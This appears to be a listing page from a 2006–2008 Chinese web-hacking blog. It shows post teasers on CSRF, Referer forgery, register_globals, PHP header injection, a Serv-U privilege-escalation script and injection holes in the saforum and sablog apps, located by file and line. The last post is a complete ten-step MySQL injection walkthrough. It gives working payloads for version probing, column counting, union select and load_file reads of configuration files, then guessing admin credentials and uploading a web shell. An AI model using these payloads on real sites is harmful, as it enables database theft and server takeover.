Posted by amxku on 2008-02-26, 11:55 AM
我对跨站请求伪造(Cross Site Request Forgery,即csrf)技术有一定研究,但是对网站开发者应当采取的措施研究不深。这些日子在编写一个对用户和管理员(这些人对他们的任务并不明晰:P)有高度安全要求的分布式网站程序时,我被这个话题深刻的纠缠了。
针对这种情况,我必须考虑程序最终可能受到的各个方面的可能的攻击威胁。
给我最多麻烦的就是Session欺骗(或者csrf,你可以按照自己喜欢的方式称呼),因为这种攻击是完全以用户的身份,因此并没有百分百的可能性来防止它。
如果你对我刚才说所的Session欺骗并不太了解,那么你可以阅读:http://www.playhack.net/view.php?id=30
» 阅读全文
Tags: csrf, xss, 脚本渗透
技术 | 评论: 1 | 阅读: 1803
Posted by amxku on 2007-10-22, 5:48 PM
HTTP-REFERER这个变量已经越来越不可靠了,完全就是可以伪造出来的东东。
原理都是sock构造http头来senddata。其他语言什么的比如perl也可以,
目前比较简单的防御伪造referer的方法是用验证码(Session)。
现在有一些能防盗链软件的商业公司比如UUDOG,linkgate,VirtualWall什么的,都是开发的应用于IIS上面的dll。
有的是采用cookies验证、线程控制,有的是能随机生成文件名然后做URL重写。有的方法能的确达到不错的效果.
不过道高一尺,魔高一丈,这些雕虫小技终归是有破解方法的。
» 阅读全文
Tags: asp, php, 脚本渗透, 漏洞
技术 | 评论: 1 | 阅读: 2367
Posted by amxku on 2007-09-19, 11:29 PM
saforum 注射漏洞
saforum是国内安全研究人员修改过的saforum论坛,但是代码中有一点瑕疵导致可能被获取管理员权限:)
\include\common.php 行41~49引入没有过滤的变量
http://www.sebug.net/vulndb/2237
Tags: exp, 脚本渗透, 漏洞
共享 | 评论: 2 | 阅读: 2836
Posted by amxku on 2007-09-15, 11:15 PM
sablog是国内安全研究人员写的一款blog程序,但是代码中有一点瑕疵导致可能被获取管理员权限:)
问题出在wap/index.php里的652行左右
» 阅读全文
Tags: sablog, 0day, exp, 脚本渗透, 漏洞
共享 | 评论: 7 | 阅读: 4304
Posted by amxku on 2007-08-10, 7:38 AM
所谓的 session cookie, 就是站台在你登录成功后,
送上一个 cookie,表示你已经通过验证,但与一般cookie
不同的是,他并不会存在你的硬盘上,也就是说:
在你离开浏览器之后,就会消失,也就是意味:下次你重开
浏览器,再进此站,此 cookie 已经不见了。
那么,要怎么让这个 cookie 永远有效呢?说永远太久了
我们就来个 50 年不变吧...
http://www.xdiyer.cn/?id=431» 阅读全文
Tags: 免杀破解, 脚本渗透, 技术
共享 | 评论: 2 | 阅读: 2841
Posted by amxku on 2007-06-20, 12:21 PM
register_globals 为 On 的时候,
用import_request_variables('G')和extract($_GET)创建的变量是不会改变SESSION的。
总结:漏洞只存在于php配置register_globals = On的时候,定义的变量会改变同名的SESSION。
作者:Cos.X
小泽:好像是可以利用的,前几天见有人利用过。有时间测试测试。
» 阅读全文
Tags: 脚本渗透, php, 漏洞
技术 | 评论: 6 | 阅读: 3688
Posted by amxku on 2007-04-10, 3:27 PM
cooldiyer's blog
VBS的serv-u提权脚本。
» 阅读全文
Tags: 工具, 脚本渗透, serv-u
共享 | 评论: 1 | 阅读: 3354
Posted by amxku on 2007-03-14, 9:06 PM
出来好些时间了,看到有朋友发出来,我也发个玩玩
也就是PM.
php的东东
» 阅读全文
Tags: exp, 入侵, php, 脚本渗透
共享 | 评论: 1 | 阅读: 3848
Posted by amxku on 2007-01-03, 7:06 AM
BY 剑心
PHP本身很早就提供了对网络的支持,支持包括HTTP,FTP,MAIL在内的种种网络协议,其本身也提供了一大批能直接操作HTTP与FTP的函数,操作http的如header,操作ftp的如ftp_mkdir等等一些函数。但是由于php在控制这些函数的参数时存在漏洞,可能导致一些意外的事情发生。
大家知道'在SQL语句中可能截断前面的SQL语句,从而可能被人恶意控制整个整个语句,在http和ftp等协议中,一样存在这样的字符可能被人注入自己的命令。大家知道在HTTP中,一个HTTP头是rn分割的,而Header函数允许程序在具体的内容发送向用户前发送一个原始的http头,如果我们在参数里送入一个回车会怎么样呢?
» 阅读全文
Tags: 脚本渗透
技术 | 评论: 2 | 阅读: 3436
Posted by amxku on 2006-11-20, 12:53 PM
1.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询
3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。
6.如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常,说明存在这个表。
8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段显示出字段内容则存在些字段。
9.同理再猜解password字段,猜解成功再找后台登录。
10.登录后台,上传shell。
Tags: 脚本渗透
共享 | 评论: 0 | 阅读: 2714
